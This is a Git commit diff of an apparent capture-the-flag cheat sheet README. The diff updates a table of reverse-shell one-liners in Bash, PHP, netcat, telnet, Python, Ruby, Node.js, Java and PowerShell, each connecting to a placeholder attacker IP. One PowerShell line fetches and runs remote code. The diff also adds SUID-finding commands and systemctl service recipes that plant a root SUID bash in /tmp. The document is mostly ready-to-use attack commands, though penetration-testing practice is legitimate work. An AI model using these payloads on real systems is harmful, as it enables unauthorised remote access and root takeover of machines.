phil/CTF_CheatSheet
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Added quick SUID to Cheatsheet

Browse Source
This commit is contained in:
Phil 2021-12-28 16:51:40 +00:00
parent b5d9ca42cd
commit 26eabd4925
1 changed files with 55 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

70
README.md
View File

@ -331,19 +331,19 @@ function printit ($string) {
| Program | Command |
|----------|---------|
| Netcat Listen | ncat -vlnp 4444 |
| Netcat Listen | ncat -lvnp 4444 |
| Bash | bash -i >& /dev/tcp/IP/4444 0>&1 |
| Bash | bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' |
| PHP | php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` |
| Netcat Connect | nc -e /bin/sh ^IP^ 5566`|
| Telnet | mknod backpipe p && telnet ^IP^ 5566 0<backpipe | /bin/bash 1>backpipe` |
| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` |
| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); |
| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` |
| PHP | php -r '$sock=fsockopen("^IP^",4444);exec("/bin/sh -i <&3 >&3 2>&3");'` |
| Netcat Connect | nc -e /bin/sh ^IP^ 4444`|
| Telnet | mknod backpipe p && telnet ^IP^ 4444 0<backpipe | /bin/bash 1>backpipe` |
| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` |
| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(4444, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); |
| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/4444 0>&1'");` |
| Java | Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` |
| Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html |
| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd |
| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 4444 -e cmd |
@ -392,7 +392,7 @@ export TERM=xterm
### Lets Have a Look Around
* PEASS-ng
##### PEASS-ng
| OS | Links |
|----|------|
@ -400,15 +400,55 @@ export TERM=xterm
| Windows x68 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe |
|Windows x86 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe |
* GTFObins
> https://gtfobins.github.io/
* Linux Tools
### Escalate Privileges
##### SUID
* Find SUID Files
| Command| Discription |
|--------|-------------|
| find / -type f -user root -perm -4000 2>/dev/null | Find SUID Files |
| find / -user root -perm -4000 2>/dev/null | Find SUID Files |
* SUID Cheatsheet
* systemctl
```
cd /tmp
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "COMMAND HERE"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
```
* Create a Service that will give `/bin/bash` a Root SUID
```
cd /tmp
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash;chmod +s /tmp/bash"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/bash -p
```
Search [GTFO Bins](https://gtfobins.github.io/) for exploits
##### Linux Tools